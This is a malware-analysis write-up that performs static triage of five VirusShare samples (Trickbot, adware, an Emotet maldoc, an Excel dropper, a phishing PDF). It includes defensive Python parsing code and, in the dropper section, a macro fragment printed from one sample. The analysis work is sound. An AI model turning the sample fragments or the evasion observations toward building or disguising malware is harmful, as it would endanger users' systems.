Malware Analysis

September 2, 2025

What This Project Is About

Here I showcase some malware samples that I obtained from malicious WhatsApp messages and the internet, then analyze them using both static and dynamic malware analysis methods.

What is Malware Analysis?

The art of dissecting malware to understand how it works, how to identify it, and how to defeat or eliminate it.

Objectives of Malware Analysis

  1. Determine exactly what happened
  2. Locate all infected machines
  3. Locate all infected files

Techniques of Malware Analysis

  • Basic Static Analysis
  • Advanced Static Analysis
  • Dynamic Analysis

A. Basic Static Malware Analysis

Definition

Analyzing the executable file without looking at the actual instructions (no disassembly and no execution).

Main Objectives

  • Confirm whether the file is malicious or not
  • Provide information about the malware's functionality

Techniques

  1. Use the 'file' or 'binwalk' command to identify the file type (DLL, EXE, document, archive)
  2. Look for important strings in the file (function names, imported libraries, URLs, paths)
  3. Identify whether the executable is obfuscated / packed
  4. Inspect the PE headers (imports, sections, subsystem) to reveal the malware's functionality
  5. Use hashes to identify known malware and antivirus tools to confirm maliciousness

Techniques, Objectives Breakdown and Tools Used

  1. Use the 'file' or 'binwalk' command to identify the file type

Objectives

  • Identify the target OS and the corresponding architecture
  • Confirm whether a file is a PE (.exe, .dll, etc.)
  • Check the file signature (magic bytes) in the file header instead of trusting the extension (a double extension such as invoice.pdf.exe is a common trick). For example, PE files start with the two bytes 4D 5A ("MZ"), their DOS stub normally carries the notice "This program cannot be run in DOS mode", and the PE header proper starts with the signature 50 45 00 00 ("PE\0\0") at the offset stored in the e_lfanew field (bytes 0x3C to 0x3F of the file).

Tools Used

  a. 'file' or 'binwalk'

file is a terminal command that reports the type of a file from its magic bytes, while binwalk is a terminal command for analyzing, reverse engineering, and extracting firmware images, file systems, and other binary data (it scans the whole file for embedded signatures, not just the first bytes).

  b. HxD

A GUI hex editor that shows the raw bytes of a file, which lets us check the signature by hand.

  c. PE Studio

Here we use this tool to identify the type of file and to read its PE headers.

  d. Detect It Easy

A GUI tool that identifies the type of a file and whether it is packed / obfuscated. It can also flag suspicious characteristics, but it is not an antivirus and does not by itself decide whether the file is malicious.

  2. Look for important strings in the file (function names or imported libraries)

Objectives

  • Extract readable characters and words from the sample (both ASCII and Unicode / UTF-16 format)
  • Get an idea of the malware's functionality
  • Get valuable information (file names, URLs, IP addresses, registry keys, etc.)

Tools used

  a. 'strings' command

A command-line tool that prints the printable strings contained in a file. Here we look for things like file names, URLs, IP addresses, registry keys and API names.

  b. PE Explorer

A GUI for viewing, editing, and analyzing executable files, such as Windows PE (Portable Executable) files and DLLs (Dynamic Link Libraries).

  3. Identify if the executable is obfuscated / packed

Objectives

  • Identify packers / obfuscators, which hide the real code and strings from static analysis (packers compress or encrypt the PE and restore it only at runtime)
  • If the file is packed, try to unpack it

Tools used

  a. PEiD

A GUI tool used to detect whether a file is packed / obfuscated by matching signatures against the headers and entry-point bytes of a PE (Portable Executable) file.

  b. Exeinfo PE

A GUI tool that determines whether a file is packed and which packer was used. It also suggests how to unpack the file (if packed).

  c. Detect It Easy

A GUI tool that determines whether a file is packed / obfuscated by looking at section names and characteristics, entropy analysis, imported functions, overlay analysis, and signature matching.
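As an added example (not code from the report or from any of the tools above), the following Python script performs, with the standard library only, the checks this section describes: the magic-byte signature test from technique 1, the MZ/e_lfanew/PE header walk, the per-section entropy and section-name heuristics that tools like Detect It Easy use for packer detection, and the MD5/SHA-256 hashes of technique 5. The packer section names, the 7.0 bits/byte entropy threshold and the synthetic PE builder (constructed test input, not a real sample) are assumptions of the example.

```python
import hashlib
import math
import struct
from collections import Counter

# Leading signatures of the formats met in this report (values from the format specifications).
MAGICS = [
    (b"MZ", "PE/DOS executable (MZ)"),
    (b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1", "OLE2 compound file (DOC/XLS 97-2003)"),
    (b"%PDF-", "PDF document"),
    (b"PK\x03\x04", "ZIP container (OOXML, APK, JAR, ...)"),
]
MACHINE = {0x014C: "i386 (32-bit)", 0x8664: "x86-64", 0x01C4: "ARM Thumb-2", 0xAA64: "ARM64"}
SUBSYSTEM = {1: "native", 2: "Windows GUI", 3: "Windows CUI"}
# Section names left behind by common packers (a signature-style hint, not proof).
PACKER_SECTIONS = {"UPX0", "UPX1", "UPX2", ".aspack", ".adata", ".petite", ".MPRESS1", ".MPRESS2", ".themida", ".vmp0", ".vmp1"}
ENTROPY_PACKED = 7.0  # bits/byte; compressed or encrypted data sits close to the 8.0 maximum


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for empty or constant data, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def identify(data: bytes) -> str:
    """Classify a file by its leading bytes, ignoring the extension entirely."""
    for magic, label in MAGICS:
        if data.startswith(magic):
            return label
    return "unknown"


def parse_pe(data: bytes) -> dict:
    """Walk MZ header -> e_lfanew -> 'PE\\0\\0' -> COFF header -> optional header -> section table."""
    if data[:2] != b"MZ" or len(data) < 0x40:
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("MZ header without PE signature (plain DOS program or corrupt file)")
    coff = e_lfanew + 4
    machine, nsections, _ts, _sym, _nsym, opt_size, _chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    opt_magic = struct.unpack_from("<H", data, opt)[0]              # 0x10B = PE32, 0x20B = PE32+
    os_major, os_minor = struct.unpack_from("<HH", data, opt + 40)  # Major/MinorOperatingSystemVersion
    subsystem = struct.unpack_from("<H", data, opt + 68)[0]         # same offset in PE32 and PE32+
    sections = []
    for i in range(nsections):
        name, vsize, _va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, opt + opt_size + i * 40)
        raw = data[raw_ptr:raw_ptr + raw_size]
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"), "virtual_size": vsize,
                         "raw_size": raw_size, "entropy": round(shannon_entropy(raw), 2)})
    # The standard MS linker DOS stub carries this notice; a stub without it is what DIE reports as "custom DOS".
    standard_stub = b"cannot be run in DOS mode" in data[0x40:e_lfanew]
    likely_packed = any(
        s["entropy"] >= ENTROPY_PACKED
        or s["name"] in PACKER_SECTIONS
        or (s["raw_size"] == 0 and s["virtual_size"] > 0x1000)  # empty on disk, large in memory: unpack target
        for s in sections
    )
    return {"format": {0x10B: "PE32", 0x20B: "PE32+"}.get(opt_magic, hex(opt_magic)),
            "machine": MACHINE.get(machine, hex(machine)), "subsystem": SUBSYSTEM.get(subsystem, str(subsystem)),
            "min_os_version": f"{os_major}.{os_minor}", "standard_dos_stub": standard_stub,
            "sections": sections, "likely_packed": likely_packed}


def triage(data: bytes) -> dict:
    """Hashes, magic-based type and (for MZ files) PE details: the basic static checks in one pass."""
    report = {"md5": hashlib.md5(data).hexdigest(), "sha256": hashlib.sha256(data).hexdigest(),
              "type": identify(data)}
    if data.startswith(b"MZ"):
        try:
            report["pe"] = parse_pe(data)
        except (ValueError, struct.error) as exc:
            report["pe_error"] = str(exc)
    return report


def build_sample_pe(section_blobs) -> bytes:
    """Constructed minimal PE32 image for exercising the parser; not a real sample and not runnable."""
    e_lfanew, opt_size, nsec = 0x40, 224, len(section_blobs)
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", e_lfanew)  # no DOS stub at all, hence "custom DOS"
    coff = struct.pack("<HHIIIHH", 0x014C, nsec, 0, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)    # PE32
    struct.pack_into("<HH", opt, 40, 4, 0)   # OS version 4.0 (the Windows 95 / NT 4 generation)
    struct.pack_into("<H", opt, 68, 2)       # IMAGE_SUBSYSTEM_WINDOWS_GUI
    ptr = e_lfanew + 4 + 20 + opt_size + 40 * nsec  # raw section data follows the headers
    table, body = b"", b""
    for name, blob in section_blobs:
        table += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), len(blob), 0x1000, len(blob), ptr,
                             0, 0, 0, 0, 0x60000020)
        body += blob
        ptr += len(blob)
    return dos + b"PE\0\0" + coff + bytes(opt) + table + body


if __name__ == "__main__":
    import json
    import sys
    with open(sys.argv[1], "rb") as fh:
        print(json.dumps(triage(fh.read()), indent=2))
```

A section whose entropy sits near 8.0, a section that is empty on disk but large in memory, or a packer-branded section name are each a reason to treat "Nothing found" from a signature scanner as "no known packer", not as "unpacked".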

  4. Use hashes to identify malware and antivirus tools to confirm maliciousness

  a. HashTab

A shell extension that shows the MD5 (and other) hash values of a file from its properties dialog.

  b. virustotal.com

A website used to look up a hash or upload a file and see which antivirus engines flag it as malicious.

Basic Malware Analysis

I. VirusShare_01b55404de50bd1a56343b2f316ff88d

  a. Identify the file type

Looking at the file in the HxD hex editor, we can see that it is a PE file (it starts with the MZ signature, and the PE signature 50 45 is present at the offset stored in e_lfanew).

Using PE Studio, we can see that it is detected as a PE file (MZ signature in its header; an executable that runs on a 32-bit CPU).

From the "file" command output above, the file is a PE32 executable (GUI).

From the "binwalk" output above, the file is also identified as a PE file.

  b. Identify if the executable is obfuscated / packed

Analyzing this file with PEiD returns "Nothing found *" in normal, deep and hardcore scan mode. This means PEiD recognizes a valid executable but matches none of its packer signatures; that is not proof that the file is unpacked, only that no known packer signature was found.

Using Detect It Easy with recursive, verbose and deep scan, the file is likewise not detected as using any known packer.

However, with the heuristic scan mode added, Detect It Easy reports "generic heuristic [custom DOS]". This means the DOS header/stub is not the standard one emitted by common linkers. It is not a security mechanism: a custom DOS stub is a hint that the binary was produced or post-processed by a non-standard tool (a packer, crypter or hand-written stub), which fits the obfuscated strings seen in the next step.

PE32: the standard 32-bit version of the Portable Executable file format.

Operating System: Windows. Detect It Easy reports the target as Windows(95), which it derives from the operating system version fields in the optional header (4.0), and a GUI subsystem. This is the minimum version the linker recorded, not necessarily the platform the sample is meant to run on.

Using Exeinfo PE, the file appears to be unpacked, but the tool notes a large .text section (which looks obfuscated, as the strings section of this report shows) and suggests running a scan or checking with DIE (Detect It Easy, whose heuristic result we already saw above).

When we run that scan, the image above shows the result.

  c. Look for important strings in the file (function names or imported libraries)

Using the "strings" command

First, we scan for ASCII strings only:

$ strings.exe -a -n 5 "C:\Users\IEUser\Desktop\Malwares\virusshare\2\VirusShare_01b55404de50bd1a56343b2f316ff88d" > "C:\Users\IEUser\Desktop\Results\String Results\VirusShare_01b55404de50bd1a56343b2f316ff88d_Ascii.txt"

Notes

  • -a → search for ASCII strings only
  • -n 5 → output only strings that are at least 5 characters long (shorter strings are mostly noise)
  • "C:\Users\IEUser\Desktop\Results\String Results\VirusShare_01b55404de50bd1a56343b2f316ff88d_Ascii.txt" → redirect the result to a text file so that we can analyse it more easily

You can see the full result here: https://drive.google.com/file/d/1qev0WoCn76LxNISrUEmuZs1lvr2rQv-i/view?usp=drive_link

From this result, it seems the file is obfuscated, so we cannot read its strings in plaintext.

Next, we scan for Unicode strings only:

$ strings.exe -u -n 5 "C:\Users\IEUser\Desktop\Malwares\virusshare\2\VirusShare_01b55404de50bd1a56343b2f316ff88d" > "C:\Users\IEUser\Desktop\Results\String Results\VirusShare_01b55404de50bd1a56343b2f316ff88d_Unicode.txt"

Notes

  • -u → search for Unicode (UTF-16) strings only
  • -n 5 → output only strings that are at least 5 characters long (shorter strings are mostly noise)
  • "C:\Users\IEUser\Desktop\Results\String Results\VirusShare_01b55404de50bd1a56343b2f316ff88d_Unicode.txt" → redirect the result to a text file so that we can analyse it more easily

You can see the full result here: https://drive.google.com/file/d/1ujeWygQli2Vz_9X6GBZgjs3AudngXlBg/view?usp=drive_link

From this result, the Unicode strings also appear to be obfuscated.

Using PE Explorer

Here we can look at the Relocations view, which lists information about the base relocations present in the file.

In this case it does not contain any useful information, which is consistent with the file being packed or obfuscated: a packed binary exposes little of its real structure until it has been unpacked.

  d. Use hashes to identify malware and confirm maliciousness with virustotal.com

Tool used: HashTab

From the VirusTotal result above, the file is detected as Trojan Trickbot (a notorious banking Trojan that first emerged in 2016; it initially targeted financial institutions, stealing sensitive banking information and credentials from infected systems).

II. VirusShare_1ad9a67240d5775395c45b64dd6529fa

  a. Identify the file type

Looking at the file in HxD, we can see that it is a PE file (MZ signature in its header, PE signature at 50 45).

Using PE Studio, we can see that it is detected as a PE file (MZ signature; a GUI executable that runs on a 32-bit CPU).

From the "file" command output above, this file is also a PE32 executable.

Using "binwalk" we can also determine that the file is a PE file.

  b. Identify if the executable is obfuscated / packed

Analyzing this file with PEiD returns "Nothing found *" in normal and deep scan mode, meaning PEiD recognizes a valid executable and matches no packer signature in those modes.

However, with the hardcore scan, PEiD identifies the file as built with Borland Delphi.

Using Detect It Easy with recursive, deep, verbose and heuristic scan modes, the file is likewise identified as a Borland Delphi binary. Note that Delphi is a compiler, not a packer: this detection tells us how the file was built, not that it is obfuscated.

PE32: as with the previous sample, it is detected as a Windows executable, more specifically with a minimum OS version of Windows(2000); it is a GUI program built with Turbo Linker and the Delphi (Pascal) compiler, and it is an Inno Setup installer.

Using Exeinfo PE, we can see that the file is an Inno Setup installer using LZMA2 compression, and the installer data appears to be encrypted; the tool suggests extracting it with InnoExtractor (havysoft.cl).

  c. Look for important strings in the file (function names or imported libraries)

Using the "strings" command

First, we scan for ASCII strings only:

$ strings.exe -a -n 5 "C:\Users\IEUser\Desktop\Malwares\virusshare\2\VirusShare_1ad9a67240d5775395c45b64dd6529fa" > "C:\Users\IEUser\Desktop\Results\String Results\VirusShare_1ad9a67240d5775395c45b64dd6529fa_Ascii.txt"

Notes

  • -a → search for ASCII strings only
  • -n 5 → output only strings that are at least 5 characters long (shorter strings are mostly noise)
  • "C:\Users\IEUser\Desktop\Results\String Results\VirusShare_1ad9a67240d5775395c45b64dd6529fa_Ascii.txt" → redirect the result to a text file so that we can analyse it more easily

You can see the full results here: https://drive.google.com/file/d/1GB8oAvwiPsw83Y93phrUiyNddO4klgJM/view?usp=drive_link

From these results there are some useful strings:

oleaut32.dll: SysFreeString, SysReAllocStringLen, SysAllocStringLen. These are the OLE Automation BSTR allocation routines that every Delphi program imports for its WideString type; they manage string memory and do not load additional DLLs.

advapi32.dll: RegQueryValueExW, RegOpenKeyExW, RegCloseKey. These read values from the registry.

user32.dll: GetKeyboardType, LoadStringW, MessageBoxA, CharNextW. GetKeyboardType and CharNextW are standard Delphi runtime imports; LoadStringW and MessageBoxA let the program load a resource string and show a message box, so some UI is displayed to the victim.

kernel32.dll: GetACP, Sleep, VirtualFree, VirtualAlloc, GetSystemInfo, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenW, lstrcpynW, etc. These are generic runtime functions (memory allocation, timing, code page and string conversion). Sleep is what an adware would use to control how long a window stays up, but none of these imports is suspicious on its own; together with the Inno Setup detection they mostly reflect the installer runtime.

advapi32.dll: RegQueryValueExW, RegOpenKeyExW, RegCloseKey, OpenProcessToken, LookupPrivilegeValueW. Besides the registry access, OpenProcessToken and LookupPrivilegeValueW are the usual prelude to adjusting the privileges of the process token.

The TLS/SSL-related strings in the image above could be used for:

  • fetching the ad content over HTTPS
  • encrypting communication between infected devices (bots) and their command-and-control (C2) servers
  • evading network security controls such as intrusion detection and prevention systems (IDS/IPS), firewalls, and deep packet inspection (DPI) devices
  • securely transmitting stolen data (credentials, personally identifiable information, exfiltrated documents) from infected devices to attacker-controlled servers

Next, we scan for Unicode strings only:

$ strings.exe -u -n 5 "C:\Users\IEUser\Desktop\Malwares\virusshare\2\VirusShare_1ad9a67240d5775395c45b64dd6529fa" > "C:\Users\IEUser\Desktop\Results\String Results\VirusShare_1ad9a67240d5775395c45b64dd6529fa_Unicode.txt"

Notes

  • -u → search for Unicode (UTF-16) strings only
  • -n 5 → output only strings that are at least 5 characters long (shorter strings are mostly noise)
  • "C:\Users\IEUser\Desktop\Results\String Results\VirusShare_1ad9a67240d5775395c45b64dd6529fa_Unicode.txt" → redirect the result to a text file so that we can analyse it more easily

You can see the full results here: https://drive.google.com/file/d/1M3lLFJlAYY-njCmVpq5GoHAIcV91Jqkl/view?usp=drive_link

From this result we can see some useful information:

Some DLL names (shell and process related) and API names appear, for example Wow64DisableWow64FsRedirection. On 64-bit Windows this call lets a 32-bit process reach the real System32 directory instead of the SysWOW64 redirect; installers use it legitimately, but malware also uses it to drop files into the native system directory, where they are less expected.

Using PE Explorer

Here we can see some potentially useful information in the Import view, which lists all the external functions and libraries that the executable imports from other DLLs (Dynamic Link Libraries).

Imported functions: the functions that the PE file imports from external DLLs, such as file I/O, user interface (UI) calls, system calls, and so on.

Imported libraries: the names of the DLLs that provide the implementations of those functions; they are dynamically linked to the executable at load time.

From the first image, the oleaut32.dll imports are the string (BSTR) memory management functions discussed above.

From the next image, the advapi32.dll imports show registry access.

The user32.dll imports (keyboard type, LoadString, MessageBox) show that the program displays a message or window to the victim, possibly the ad.

The kernel32.dll imports are the runtime core the adware relies on (memory allocation, Sleep for controlling how long the ad stays visible, string conversion).

The last image again shows the registry and token-privilege functions.

  d. Use hashes to identify malware and confirm maliciousness with virustotal.com

Tool used: HashTab

From the VirusTotal result above, the file is detected as Adware. Adware is software that displays advertisements on a user's computer, often as pop-ups, banners, or sponsored content; its purpose is to generate revenue for its developers by delivering advertisements while the user browses the internet or uses other applications.

III. VirusShare_2fe5b00079aec2d8369a798230313ec8

  a. Identify the file type

Looking at the file in HxD, it is not a PE file. Its first bytes (D0 CF 11 E0 A1 B1 1A E1) are the OLE2 compound file signature, i.e. a legacy Microsoft Office document (DOC / XLS).

Using PE Studio, the file is also not detected as a PE file; it is reported as a Microsoft Office document (DOC / XLS) from the D0 CF bytes at the start of the header.

From the image above, the "file" command identifies the file as a Microsoft Office document.

From the image above, binwalk also finds an embedded Zip archive containing a JPEG inside the document; embedded objects in an OLE file are a good place to look for a payload.

  b. Identify if the file is obfuscated / packed

Analyzing this file with PEiD returns "Not a valid PE file", meaning it does not match the basic PE signature (it is not a Portable Executable).

Using Detect It Easy with recursive, deep, heuristic and verbose scan modes, the file is detected as an MS Office file.

From the image above, the file is a non-executable, detected as an MS Office 97-2003 (OLE2) document.

Using Exeinfo PE, the file is reported as a .DOC container rather than a packed executable; the tool suggests trying another file or using the Ripper menu to carve out embedded files.

After using the Ripper menu, the image above lists all the files that were carved out.

If we unzip the carved archive with "$ unzip [filename]", the files and folders shown above are produced.

  c. Look for important strings in the file (function names or imported libraries)

Using the "strings" command

First, we scan for ASCII strings only:

$ strings.exe -a -n 5 "C:\Users\IEUser\Desktop\Malwares\virusshare\2\VirusShare_2fe5b00079aec2d8369a798230313ec8" > "C:\Users\IEUser\Desktop\Results\String Results\VirusShare_2fe5b00079aec2d8369a798230313ec8_Ascii.txt"

Notes

  • -a → search for ASCII strings only
  • -n 5 → output only strings that are at least 5 characters long (shorter strings are mostly noise)
  • "C:\Users\IEUser\Desktop\Results\String Results\VirusShare_2fe5b00079aec2d8369a798230313ec8_Ascii.txt" → redirect the result to a text file so that we can analyse it more easily

You can see the full results here: https://drive.google.com/file/d/1QVJ9qlsFsAx0ZTDR3EK0QZ9vWAD_geu4/view?usp=drive_link

From this result we get strings confirming that it is a DOC file with an embedded Forms 2.0 control:

Microsoft Forms 2.0 TextBox, Embedded Object, Forms.TextBox.1, Calibri, Microsoft Office Word, Alicia Mercier, Nisi, Title, Zepmlzbwtd, 0, 0, MSForms, TextBox

"Alicia Mercier" is document metadata (the author field) and "Zepmlzbwtd" looks like a generated name; both are worth recording as indicators for matching related documents.

Next, we scan for Unicode strings only:

$ strings.exe -u -n 5 "C:\Users\IEUser\Desktop\Malwares\virusshare\2\VirusShare_2fe5b00079aec2d8369a798230313ec8" > "C:\Users\IEUser\Desktop\Results\String Results\VirusShare_2fe5b00079aec2d8369a798230313ec8_Unicode.txt"

Notes

  • -u → search for Unicode (UTF-16) strings only
  • -n 5 → output only strings that are at least 5 characters long (shorter strings are mostly noise)
  • "C:\Users\IEUser\Desktop\Results\String Results\VirusShare_2fe5b00079aec2d8369a798230313ec8_Unicode.txt" → redirect the result to a text file so that we can analyse it more easily

You can see the full results here: https://drive.google.com/file/d/1nm6yeVH08UM0oLFU9p50FfLT5fPxYFOR/view?usp=drive_link

From the Unicode strings we can conclude that the document carries a VBA macro project. The strings below are not spoofed paths but VBA project reference records (type library GUID, version, locale ID, path and description, separated by #):

  • \G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL#Visual Basic For Applications
  • \G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB#Microsoft Word 16.0 Object Library
  • \G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\Windows\system32\stdole2.tlb#OLE Automation
  • \G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL#Microsoft Office 16.0 Object Library
  • \G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\windows\system32\FM20.DLL#Microsoft Forms 2.0 Object Library
  • \G{3D3F9F38-A9F3-48A3-AE60-38AE7491F39A}#2.0#0#C:\Users\ADMINI~1\AppData\Local\Temp\Word8.0\MSForms.exd#Microsoft Forms 2.0 Object Library

The FM20.DLL and MSForms.exd references match the "Microsoft Forms 2.0 TextBox" strings from the ASCII scan: the macro project uses a Forms control, and a hidden TextBox is a common place for a maldoc to store its obfuscated payload or command line, so its contents should be checked once the macros are extracted. The Office16 paths and the ADMINI~1 profile in the .exd path also show that the document was built on an Office 2016 installation under an "Administrator" account, which is useful for clustering related documents.

Using PE Explorer

PE Explorer cannot load this file, since it is neither an EXE nor a DLL.
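To make the VBA reference records from the Unicode strings above usable, here is an added Python parser (example code, not from the report or from any Office tooling) that splits each record into its fields and derives the indicators discussed there: whether a VBA project and Forms 2.0 controls are present, which Office version the author used, and any .exd cache paths that leak the author's environment. The GUID-to-name table covers only the type libraries seen in this sample, and PAGE_REFS repeats the six strings printed above.

```python
import re

# One VBA project reference as it appears in the Unicode strings:
#   \G{<typelib GUID>}#<major>.<minor>#<LCID>#<path>#<description>
REF_RE = re.compile(
    r"\\G\{(?P<guid>[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12})\}"
    r"#(?P<major>\d+)\.(?P<minor>\d+)#(?P<lcid>\d+)#(?P<path>[^#]+)#(?P<desc>.+)"
)
# Type library GUIDs seen in this sample, named after the description Office stores with them.
KNOWN_TYPELIBS = {
    "000204EF-0000-0000-C000-000000000046": "VBA",
    "00020905-0000-0000-C000-000000000046": "Word object library",
    "00020430-0000-0000-C000-000000000046": "stdole (OLE Automation)",
    "2DF8D04C-5BFA-101B-BDE5-00AA0044DE52": "Office object library",
    "0D452EE1-E08F-101A-852E-02608C4D0BB4": "Microsoft Forms 2.0",
}
OFFICE_DIR_RE = re.compile(r"\\Office(\d{2})\\", re.I)  # matches ...\Office16\ and ...\OFFICE16\


def parse_reference(s: str):
    """Split one reference record into its fields; returns None for strings that are not references."""
    m = REF_RE.search(s)
    if not m:
        return None
    guid = m.group("guid").upper()
    return {
        "guid": guid,
        "version": f"{m.group('major')}.{m.group('minor')}",
        "lcid": int(m.group("lcid")),
        "path": m.group("path"),
        "description": m.group("desc"),
        "known_as": KNOWN_TYPELIBS.get(guid, "unknown typelib"),
    }


def analyze_references(strings) -> dict:
    """Derive the indicators discussed above from a list of strings (references mixed with anything else)."""
    refs = [r for r in map(parse_reference, strings) if r]
    office_versions = set()
    for r in refs:
        m = OFFICE_DIR_RE.search(r["path"])
        if m:
            office_versions.add(m.group(1))
    return {
        "references": refs,
        "has_vba_project": any(r["known_as"] == "VBA" for r in refs),
        "uses_forms_controls": any(r["known_as"] == "Microsoft Forms 2.0" for r in refs),
        "author_office_versions": sorted(office_versions),
        # .exd files are per-user control caches; their path leaks the author's profile and temp directory
        "exd_cache_paths": [r["path"] for r in refs if r["path"].lower().endswith(".exd")],
    }


# The six reference strings printed above, copied from this sample's Unicode strings output.
PAGE_REFS = [
    r"\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL#Visual Basic For Applications",
    r"\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB#Microsoft Word 16.0 Object Library",
    r"\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\Windows\system32\stdole2.tlb#OLE Automation",
    r"\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL#Microsoft Office 16.0 Object Library",
    r"\G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\windows\system32\FM20.DLL#Microsoft Forms 2.0 Object Library",
    r"\G{3D3F9F38-A9F3-48A3-AE60-38AE7491F39A}#2.0#0#C:\Users\ADMINI~1\AppData\Local\Temp\Word8.0\MSForms.exd#Microsoft Forms 2.0 Object Library",
]

if __name__ == "__main__":
    import json
    print(json.dumps(analyze_references(PAGE_REFS), indent=2))
```

Feeding the whole Unicode strings output into analyze_references is fine: anything that is not a reference record is skipped, so the same call works on the raw strings dump of any Office document.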

  d. Use hashes to identify malware and confirm maliciousness with virustotal.com

Tool used: HashTab

From the VirusTotal result above, the file is detected as Trojan Downloader Emotet. Emotet is a highly adaptable trojan known for its role as a downloader of other malware, its global impact, and its ability to evade detection and maintain persistence on infected systems.

IV. VirusShare_3f0b1eed4b7b9ae05fab4d949843f103

  a. Identify the file type

Looking at the file in HxD, it is not detected as a PE file.

Using PE Studio, it is also not detected as a PE file; PE Studio reports it as a Microsoft document type (DOC / XLS) because of D0 CF in the first bytes of the header.

From the image above, neither "file" nor "binwalk" returned a useful result for this sample.

  b. Identify if the file is obfuscated / packed

Analyzing this file with PEiD returns "Not a valid PE file", meaning it does not match the basic PE signature (it is not a Portable Executable).

Using Detect It Easy with recursive, deep, verbose and heuristic scan modes, the file is detected as an archived (zip-based) MS Office document. Note that this conflicts with the D0 CF reading above: an OLE2 document cannot be unzipped, whereas a zip-based Office Open XML workbook can, and the successful unzip below confirms the zip container.

If we add the .zip extension to the file and unzip it, this is the result:

Inside the VBA directory:

From the image above we can see that it contains several xls files.

  c. Look for important strings in the file (function names or imported libraries)

Using the "strings" command on all the unzipped xls files

You can see the full results here: https://drive.google.com/file/d/1NRk0IhBFFekXuSnJST-zBsZ4VfIBOlk4/view?usp=drive_link

From these results there are some interesting strings (some are garbled where strings ran fragments together):

Files\CommoMicrosoft Shared\OFFICE15\MSO.0DLL C:\Windows\syst em32\tlb

Wscript.Shell

Set oFile = gfdgfdgdf.CreateTextFile("C:\secret\test1.txt") '37492:script1.vbs

The OFFICE15 path shows that the macro project references Office 2013 libraries. WScript.Shell is the COM object macros use to run commands or touch the registry, and the CreateTextFile call writing C:\secret\test1.txt (with a comment referencing script1.vbs) shows the macro dropping a file to disk, which matches the dropper verdict below.

Using PE Explorer

PE Explorer cannot load this file, since it is neither an EXE nor a DLL.

  d. Use hashes to identify malware and confirm maliciousness with virustotal.com

Tool used: HashTab

From the VirusTotal result above, the file is detected as MSExcel.Generic Dropper or Downloader. This is a generic detection name antivirus engines use for Microsoft Excel files (XLS or XLSX) whose macros drop or download further malware, rather than the name of a specific family.

V. VirusShare_480ef02bb062a57724e1b3e14532a140

  a. Identify the file type

Looking at the file in HxD, it is not a PE file but a PDF (it starts with %PDF).

Using PE Studio, it is also not detected as a PE file but as a PDF.

From the "file" command output above, the file is a PDF.

From the "binwalk" output above, the file also contains zlib-compressed streams (FlateDecode objects). That is normal for PDFs, but it means any URLs or JavaScript inside those streams stay invisible to strings until the streams are inflated.

  b. Identify if the file is obfuscated / packed

Analyzing this file with PEiD returns "Not a valid PE file", meaning it does not match the basic PE signature (it is not a Portable Executable).

Using Detect It Easy with recursive, deep, verbose or heuristic scan modes, no packer / obfuscation is detected.

The file is not an executable but a PDF, with LF line endings.

  c. Look for important strings in the file (function names or imported libraries)

Using the "strings" command

First, we scan for ASCII strings only:

$ strings.exe -a -n 5 "C:\Users\IEUser\Desktop\Malwares\virusshare\2\VirusShare_480ef02bb062a57724e1b3e14532a140" > "C:\Users\IEUser\Desktop\Results\String Results\VirusShare_480ef02bb062a57724e1b3e14532a140_Ascii.txt"

Notes

  • -a → search for ASCII strings only
  • -n 5 → output only strings that are at least 5 characters long (shorter strings are mostly noise)
  • "C:\Users\IEUser\Desktop\Results\String Results\VirusShare_480ef02bb062a57724e1b3e14532a140_Ascii.txt" → redirect the result to a text file so that we can analyse it more easily

You can see the full results here: https://drive.google.com/file/d/1A7p9cKzaUfzOijo8iNqWo3Wbjrvghj2P/view?usp=drive_link

From these results there are some interesting strings: the strings shown above look like suspicious links (URLs), which is exactly what a phishing PDF needs to lure the reader.

Next, we scan for Unicode strings only:

$ strings.exe -u -n 5 "C:\Users\IEUser\Desktop\Malwares\virusshare\2\VirusShare_480ef02bb062a57724e1b3e14532a140" > "C:\Users\IEUser\Desktop\Results\String Results\VirusShare_480ef02bb062a57724e1b3e14532a140_Unicode.txt"

Notes

  • -u → search for Unicode (UTF-16) strings only
  • -n 5 → output only strings that are at least 5 characters long (shorter strings are mostly noise)
  • "C:\Users\IEUser\Desktop\Results\String Results\VirusShare_480ef02bb062a57724e1b3e14532a140_Unicode.txt" → redirect the result to a text file so that we can analyse it more easily

You can see the full results here: https://drive.google.com/file/d/1qsTYbufQ2fFs2hRI6Dragh99r_HnszLk/view?usp=drive_link

From this result, there appear to be no Unicode strings.

Using PE Explorer

PE Explorer cannot load this file, since it is neither an EXE nor a DLL.

